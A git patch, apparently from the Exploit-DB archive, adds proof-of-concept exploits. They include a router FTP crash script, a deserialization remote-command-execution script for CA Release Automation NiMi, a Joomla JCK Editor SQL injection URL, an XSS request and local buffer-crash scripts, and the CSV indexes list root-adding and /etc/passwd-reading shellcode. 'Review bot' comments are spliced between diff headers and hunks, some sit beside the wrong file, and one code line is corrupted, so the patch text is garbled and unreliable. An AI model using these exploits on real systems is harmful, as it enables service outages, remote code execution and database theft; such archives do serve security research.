From f1d68507cdef266ca17c15e63f5948422ada2da8 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 18 Sep 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-09-18

7 changes to exploits/shellcodes

XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
Notebook Pro 2.0 - Denial Of Service (PoC)
Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)
Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
CA Release Automation NiMi 6.5 - Remote Command Execution
Gitweb 1.7.3.3 - Cross-Site Scripting
gitWeb 1.7.3.3 - Cross-Site Scripting
Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting
Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)
Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)
Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)
Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
---
 exploits/hardware/dos/45424.py | 43 +++++++++++++++++++
 exploits/hardware/webapps/45422.txt | 30 ++++++++++++++
 exploits/java/remote/45425.py | 62 ++++++++++++++++++++++++++++
 exploits/php/webapps/45423.txt | 14 +++++++
 exploits/windows_x86-64/dos/45420.py | 28 +++++++++++++
 exploits/windows_x86-64/dos/45421.py | 28 +++++++++++++
 exploits/windows_x86/dos/45419.py | 29 +++++++++++++
 files_exploits.csv | 9 +++-
 files_shellcodes.csv | 8 ++--
 9 files changed, 246 insertions(+), 5 deletions(-)
 create mode 100755 exploits/hardware/dos/45424.py
 create mode 100644 exploits/hardware/webapps/45422.txt
 create mode 100755 exploits/java/remote/45425.py
 create mode 100644 exploits/php/webapps/45423.txt
 create mode 100755 exploits/windows_x86-64/dos/45420.py
 create mode 100755 exploits/windows_x86-64/dos/45421.py
 create mode 100755 exploits/windows_x86/dos/45419.py

diff --git a/exploits/hardware/dos/45424.py b/exploits/hardware/dos/45424.py
new file mode 100755
index 000000000..363287835
--- /dev/null
+++ b/exploits/hardware/dos/45424.py
@@ -0,0 +1,43 @@
+# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
+# Author: Cakes
+# Discovery Date: 2018-09-16
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
+# Tested Version: RTK 2.1.1
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description
+# The FTP service is vulnerable to a Denial of Service attack. Attackers simply need to log
+# into the router and send and valid FTP command with a character offset of 1461 as the command input
+
+import socket
+
+evil = '\x41'*1461
+
+print "\n[*] Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)"
+print "\r[i] Creating socket"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "\r[i] Connecting..."
+connect = s.connect(('192.168.1.1',21))
+s.recv(1024)
+
+try:
+    s.send('USER guest\r\n')
+    s.recv(1024)
+    s.send('PASS guest\r\n')
+    s.recv(1024)
+    print "\r[+] Connected"
+except:
+    print "\r[!] Credentials aren't working. Please change if none default"
+
+print "\r[+] Sending Payload"
+
+try:
+    s.send('ABOR %s' % (evil))
+    print "\r[+] Payload sent"
+    print "\r[+] Router offline"
+except:
+    print "\r[!] Something went wrong"
+
+s.close()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45422.txt b/exploits/hardware/webapps/45422.txt
new file mode 100644
index 000000000..09ea17e7f
--- /dev/null
+++ b/exploits/hardware/webapps/45422.txt
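Review bot: The login check in 45424.py cannot detect a rejected login: a `530` reply from the FTP server is returned normally by `s.recv(1024)`, so the `except:` branch only fires on socket errors and `[+] Connected` is printed even with wrong credentials, after which the payload is sent regardless. Capture the reply and test its code instead, e.g. `resp = s.recv(1024)` after `PASS` followed by `if not resp.startswith('230'): raise SystemExit('[!] Login failed: ' + resp.strip())`. The target `192.168.1.1` and the `guest`/`guest` credentials are hard-coded rather than taken from `sys.argv`, and the `ABOR` line is sent without a terminating `\r\n`, so the PoC does not establish whether the crash comes from the 1461-byte command itself or from the un-terminated read. Both `except:` clauses should at least name the exception (`except socket.error as e:`) and print it so a failed run is distinguishable from a router that really went offline; the file is also committed `100755` without any shebang line.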
@@ -0,0 +1,30 @@
+# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2018-09-16
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
+# Tested Version: RTK 2.1.1
+# Tested on OS: Kali Linux
+# CVE: N/A
+
+# Description:
+# Improper input validation on the router web interface allows attackers add a persistent
+# Cross-Site scripting attack on the Dynamic DNS hostname field. Simply intercept a renaming
+# request and add in the XSS
+
+# Poc
+
+POST /form2Ddns.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://Target/ddns.htm?v=1537192256000
+Cookie: SessionID=
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+
+ddnsProv=0&hostname=&interface=15&enable=on&username=tester&password=tester&addacc=Add&submit.htm%3Fddns.htm=Send
\ No newline at end of file
diff --git a/exploits/java/remote/45425.py b/exploits/java/remote/45425.py
new file mode 100755
index 000000000..02e2a5437
--- /dev/null
+++ b/exploits/java/remote/45425.py
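Review bot: The PoC request does not contain the injected script: `hostname=` is empty in the body, and the body as shown is 113 bytes while `Content-Length: 119` is declared, which suggests the payload was stripped before the file was committed. A reader cannot reproduce the stored XSS from this; the `hostname` value should carry an explicit URL-encoded marker such as `hostname=%3Cscript%3Ealert(1)%3C%2Fscript%3E` and `Content-Length` must be recomputed to match. The description should also state that the request is sent with a valid `SessionID` cookie, i.e. the injection point is reachable only to an authenticated router user, and name the page that renders the stored hostname so the impact (where the script runs, and for whom) is clear. Whether `form2Ddns.cgi` accepts the POST without any anti-CSRF token, which would let the stored script be planted cross-site, is not established here.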
@@ -0,0 +1,62 @@
+# Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution
+# Date: 2016-06-23
+# Exploit Authors: Jakub Palaczynski, Maciej Grabiec
+# Vendor Homepage: http://www.ca.com/
+# Software Link: https://docops.ca.com/ca-release-automation/5-5-2/en/installation/deploy-agents/
+# Version: CA Release Automation (NiMi) 5.X, 6.3, 6.4, 6.5
+# CVE: CVE-2018-15691
+# Info: CA Release Automation (NiMi) Remote Command Execution via Deserialization
+# Info: Payloads generated using CommonsCollections1 from ysoserial work correctly.
+# Info: Proof of Concept exploits NiMi service if security is turned off.
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) < 4:
+    sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0])
+    sys.stderr.write("[-]Exemple: python %s 10.0.0.1 6600 /tmp/payload.bin\n" % sys.argv[0])
+    exit(1)
+
+host = sys.argv[1]
+port = sys.argv[2]
+file = sys.argv[3]
+
+# check if payload does not exceed specified value
+payloadObj = open(file,'rb').read()
+if len(payloadObj) > 5729:
+    print 'Payload must be less than 5730 bytes. Try another one.'
+    exit(1)
+
+# open socket to nimi port
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print 'Connecting to node.'
+sock.connect((host, int(port)))
+
+# say hello to nimi
+sock.recv(256)
+sock.send('\x00\x00\x00\x0c\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x72\x02\x08\x00') # first required message
+
+# get Node ID
+data = sock.recv(256)
+name = data[5] + data[6:6+ord(data[5])]
+if len(sys.argv) == 5:
+    name = struct.pack(">B", len(sys.argv[4])) + sys.argv[4]
+
+# check if security is enabled
+sock.send('\x00\x00\x00\x1a\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x7a\x10\x0a\x0c\x0a\x07\x30\x2e\x30\x2e\x30\x2e\x30\x10\x94\x3c\x10\x00') # second required message
+check = sock.recv(256)
+if check == "":
+    print 'Security is enabled. Sorry.'
+    exit(1)
+
+# send payload
+print 'Sending payload.'
+header = '\x0a\x04\x6e\x6f\x64\x65\x10\x01\x1a' + name + '\x2a\xe4\x2c\x0a\xe1\x2c'
+stage = header + payloadObj + '\x90' * (5729-len(payloadObj))
+payload = struct.pack(">I", len(stage)) + stage
+
+sock.sendall(payload)
+sock.close()
\ No newline at end of file
diff --git a/exploits/php/webapps/45423.txt b/exploits/php/webapps/45423.txt
new file mode 100644
index 000000000..d2d5cfd74
--- /dev/null
+++ b/exploits/php/webapps/45423.txt
@@ -0,0 +1,14 @@
+# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
+# Date: 2018-09-14
+# Exploit Author: Hamza Megahed
+# Vendor Homepage:https://www.joomla.org/
+# Download: https://arkextensions.com/products/jck-editor
+# Version: 6.4.4
+# Tested on: Ubuntu, FireFox,
+# CVE: N/A
+
+# Parameter = parent
+# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
+# Poc:
+
+Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45420.py b/exploits/windows_x86-64/dos/45420.py
new file mode 100755
index 000000000..f27d11b75
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45420.py
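Review bot: The reply parsing in 45425.py trusts a single `sock.recv(256)` to deliver the whole node message: `name = data[5] + data[6:6+ord(data[5])]` raises IndexError on a short or empty read, and `if check == "":` treats any closed connection, not only a security-enabled node, as "Security is enabled". Guard the length before indexing, e.g. `if len(data) < 6 or len(data) < 6 + ord(data[5]): raise SystemExit('Unexpected node reply: %r' % data)`, and word the security message as "connection closed by node" rather than asserting the cause. The `#!/usr/bin/python` line is on line 12, so although the file is created with mode `100755` executing it directly runs it through the shell; move the shebang to line 1. `open(file,'rb').read()` also leaves the handle open and shadows the `file` builtin — `with open(sys.argv[3], 'rb') as fh: payloadObj = fh.read()` fixes both, and the usage string on line 19 has lost its argument placeholders (`%s` is followed only by a newline) so the optional fifth argument consumed on line 46 is undocumented.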
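Review bot: The advisory for 45423.txt does not say whether `links.php` is reachable without a Joomla session, nor which release fixes the issue, so a reader cannot triage exposure from the PoC alone; add a line such as `# Authentication: none required (direct request to the dialog script)` only if that was verified, otherwise record the session that was used. The eight `NULL` columns and the `-- aa` tail (MySQL `-- ` comment syntax, judging by `@@version`) imply the vulnerable SELECT returns eight columns on a MySQL backend — stating that explicitly tells a reader what to adjust for a different column count or DBMS. `Version: 6.4.4` and the title leave open whether earlier JCK Editor releases are affected, and `Tested on: Ubuntu, FireFox,` has a dangling comma.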
@@ -0,0 +1,28 @@
+# Exploit Title : Notebook Pro 2.0 - Denial Of Service (PoC)
+# Exploit Author : Ali Alipour
+# WebSite : http://Alipour.it
+# Date: 2018-09-14
+# Vendor Homepage : http://www.stokedonit.com/apps/notebook-pro/
+# Software Link Download : https://www.microsoft.com/store/apps/9WZDNCRDMC76
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new
+# file with the name "Notebook.txt" just copy the text inside "Notebook.txt"
+# and start the Notebook Pro 2.0 - In Microsoft Windows 10 .
+# In The New Window Click On " New " And Click On notebook Button ( Create a New NoteBook ) .
+# Now Paste The Content Of "Notebook.txt" Into The Field: " New NoteBook Name ".
+# Click "Create & Save" And You Will See a [ Boom !!!! ] - Notebook Pro 2.0 - In Microsoft Windows 10 [ Crash ].
+
+#!/usr/bin/python
+
+buffer = "A" * 500
+payload = buffer
+try:
+    f=open("Notebook.txt",22"w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45421.py b/exploits/windows_x86-64/dos/45421.py
new file mode 100755
index 000000000..291e275f1
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45421.py
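Review bot: As committed, `f=open("Notebook.txt",22"w")` on line 22 of 45420.py is not valid Python — the stray `22` before `"w"` is a syntax error, so the script cannot create the file at all (if the `22` is a transcription artifact of this listing, the stored file should still be checked). The bare `except:` hides the cause of any failure, including a Ctrl-C, behind a fixed `File cannot be created`; write it as `with open("Notebook.txt", "w") as f: f.write(payload)` and `except IOError as e: print "File cannot be created: %s" % e`. The `#!/usr/bin/python` line sits at line 17 rather than line 1, so the `100755` mode does not make the file directly executable. The reproduction steps require a local user to paste the 500-byte string into a GUI field, so the header should classify this as a local client-side crash rather than a remote denial of service.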
@@ -0,0 +1,28 @@
+# Exploit Title: Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)
+# Discovery by: Jose Eduardo Castro
+# Discovery Date: 2018-09-14
+# Vendor Homepage: https://www.virtualbox.org/
+# Software Link: https://download.virtualbox.org/virtualbox/5.2.18/VirtualBox-5.2.18-124319-Win.exe
+# Tested Version: 5.2.18 r124319
+# Tested on OS : Windows 7 Ultimate x64 es
+
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+# Steps to Produce the DoS:
+# 1.- Run python code : python vb_dos.py
+# 2.- Open string.txt and copy content to clipboard
+# 3.- Open VM VirtualBox Manager
+# 4.- Select a created virtual machine in mode "power off" and select "Settings"
+# 5.- Select "Storage" button
+# 6.- Select option "Adds new storage controller" and select any controller
+# 7.- Paste ClipBoard on "Name"
+# 8.- Clic OK
+# 9.- DoS
+
+import socket, os, sys
+
+buffer = "\x41" * 5000
+
+f = open ("string.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45419.py b/exploits/windows_x86/dos/45419.py
new file mode 100755
index 000000000..8b085e1a3
--- /dev/null
+++ b/exploits/windows_x86/dos/45419.py
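Review bot: `import socket, os, sys` in 45421.py brings in three modules the script never uses — it only writes `string.txt` — and should be deleted; it also misleads a reader into expecting a network component in what is a local paste-to-crash. The file is written with `f = open ("string.txt", "w")` / `f.close()` and no error handling; `with open("string.txt", "w") as f: f.write(buffer)` closes it on every path and reports an unwritable directory with a real exception. `#!/usr/bin/env python` and the coding line are on lines 9-10, after the header comments, so the `100755` mode does not make the file directly executable; they need to be the first two lines. The steps show the 5000-byte controller name is pasted by a local user into the VirtualBox Manager dialog, so the header should classify this as a local GUI crash rather than a service denial of service.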
@@ -0,0 +1,29 @@
+# Exploit Title: XAMPP Control Panel 3.2.2 - Denial of Service (PoC)
+# Exploit Author: Gionathan "John" Reale
+# Date: 2018-09-14
+# Software: XAMPP
+# Version: 3.2.2 / 7.2.9 (Newest version at time of writing)
+# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
+# Tested on: Windows 7 32bit
+
+# Steps to Reproduce:
+# Run the python exploit script, it will create a new file with the name "exploit.txt".
+# Copy the contents of "exploit.txt"
+# Start the program and click "Config(Top Right With Symbol)"
+# Paste the contents of "exploit.txt" into the following fields:"Editor" & "Browser".
+# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)".
+# You will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d3a173108..aa7081f4b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
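Review bot: The bare `except:` in 45419.py swallows every exception, including `KeyboardInterrupt`, and prints a fixed `File cannot be created` with no reason; catch `IOError as e` and include `e` in the message. Line 17's `#!/usr/bin/python` is not honoured because a shebang must be the first line, yet the file is committed `100755`; move it above the header comments. `buffer` shadows the Python 2 builtin of the same name and `payload = buffer` is a redundant alias — `with open("exploit.txt", "w") as f: f.write("A" * 6000)` is the entire script. The crash needs the 6000-byte string pasted into the Control Panel's Editor and Browser fields by a local user, so the header should describe this as a local GUI crash and, if it was observed, whether the saved configuration makes the panel crash again on every later Config click.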
@@ -6112,6 +6112,10 @@ id,file,description,date,author,type,platform,port
 45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64,
 45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86,
 45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
+45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86,
+45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64,
+45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64,
+45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16802,6 +16806,7 @@ id,file,description,date,author,type,platform,port
 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
 45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
 45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
+45425,exploits/java/remote/45425.py,"CA Release Automation NiMi 6.5 - Remote Command Execution",2018-09-17,"Jakub Palaczynski",remote,java,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -25254,7 +25259,7 @@ id,file,description,date,author,type,platform,port
 33671,exploits/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,webapps,php,
 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,
 15703,exploits/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",webapps,asp,
-15744,exploits/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80
+15744,exploits/cgi/webapps/15744.txt,"gitWeb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80
 15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,
 15711,exploits/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,webapps,php,
 15714,exploits/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",webapps,php,
@@ -39967,3 +39972,5 @@ id,file,description,date,author,type,platform,port
 45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
 45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
 45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
+45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,
+45423,exploits/php/webapps/45423.txt,"Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection",2018-09-17,"Hamza Megahed",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index dd333117d..2e8a7587d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -908,7 +908,7 @@ id,file,description,date,author,type,platform
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
-45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
-45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
-45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
-45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86